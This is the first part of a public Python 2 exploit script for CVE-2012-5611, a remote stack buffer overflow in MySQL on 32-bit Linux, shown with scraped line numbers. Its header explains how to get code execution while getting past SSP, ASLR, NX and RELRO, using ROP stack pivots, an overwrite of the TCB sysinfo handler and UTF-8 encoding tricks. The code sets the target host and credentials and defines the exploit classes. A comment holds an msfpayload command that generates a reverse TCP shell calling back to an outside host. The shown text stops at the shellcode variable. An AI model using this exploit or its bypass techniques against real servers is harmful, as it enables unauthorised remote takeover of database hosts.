mysql stack_MySQL Stack Buffer Overflow Linux x86 32bits

1 !/usr/bin/env python2 #27/12/12 - status : public release

3

4 #CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )

5 #-------- Author : ipv

6 #-------- Impact : high

7 #-------- URL : http://blog.ring0.me/

8 #-------- Description

9 #10 #The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.

11 #MySQL server is prone to a remote buffer overflow that

12 #allow remote authenticated attacker to reach code execution in the

13 #context of the user running MySQL instance (default: mysql user).

14

15 #The vulnerability resides in acl_get function, called when authenticated

16 #user requests a privileged Account Managment statement. MySQL fails

17 #to verify user controlled data len of "db" parameter.

18 #19 #end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);

20 #21 #The destination address of strcpy is located on a mmaped page dedicated to

22 #user connection which allow a buffer overflow on adjacent memory.

23 #24 #Differents attacks vector may be possiblea according the system.

25 #FYI Microsoft Windows versions are as well vulnerables.

26 #---------------------------------------------------------

27 #To bypass ASLR/SSP/RELRO/NX:

28 #------------------------------------------------------------------------------

29 #I take profit of Threading-Model. This means MySQL use only one address

30 #space for all MySQL ressources (data structures, network managment,

31 #session, etc.).

32 #To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of

33 #TCB structure located more higher on the stack.

34 #ROP chains aims to pivot to our controlled stack data. At this point,

35 #if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT

36 #deferencing technique since libc API relies on the sysinfo pointer

37 #to call sysenter.

38 #39 #So to accomplish code exec, afaik, you have two way :

40 #1 - Extract sysinfo of an intact TCB and use it as proxy call

41 #(or you can restore the first sysinfo after doing modification on got)

42 #-> i use it for redhat exploit (no SSP on redhat/centos);

43 #-> this allow us to bypass relro/alsr/nx

44 #relro.

45 #2 - Find a int0x80 / sysenter gadget in .text ;

46 #(Bad instruction follow int0x80 gadget, you have a one shooter to get

47 #code exec). So, i advise you to find a sysenter)

48 #- i use sysenter for ubuntu 10.04 self-compiled with SSP.

49 #- this allow us bypass relro/ssp/alsr/nx

50 #

51 #Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass

52 #SSP/ASLR/NX.

53 #54 #---------------------------------------------------------

55 #UTF-8 and ROP chains limitation :

56 #---------------------------------------------------------

57 #Mysql Schema Object Name restricts database name to be alpha numeric

58 #(and $ _).

59 #To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is

60 #done via MySQL when databasename is quoted with `` (mandatory to

61 #successful exploit target). Yes the devil is in the details.

62

63 #MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html

64 #65 #For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net

66

67 ########################################################################

68 #Modules

69 #70

71 importpymysql72 importsys73 importstruct74 importos, socket75

76 ########################################################################

77 #Authentication options

78 #79

80 MYSQL_USER = "test"

81 MYSQL_PASSWORD = ""

82

83 #MYSQL_HOST = "192.168.130.147"

84 MYSQL_HOST = "192.168.130.129"

85 MYSQL_PORT = 3306

86

87 ########################################################################

88 #Helper

89 #

90

91 def_x(v):92 ifisinstance(v, str):93 returnv94 return struct.pack("

96 #TCP is used when we face to SSP

97 class_TCB:98 tcb = 0 #updated later by a ret gadget

99 dtv = "BBBB"

100 _self = "CCCC"

101 multiple_threads= "DDDD"

102 sysinfo = 0 #SEIP - updated later by stack pivot gadget

103 stack_guard = "AAAA"

104 pointer_guard = 0 #updated later by a pop pop ret gadget

105

106 #base class

107 classrc_base:108 eip_off =0109 align_payload =0110 align_stack = 2048

111 retsled = ""

112 safe_overwrite = ""

113 pivot = ""

114 pppr = ""

115 ppr = ""

116

117 #./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp

118 #XXX - CHANGEME !

119 sc_rev_tcp =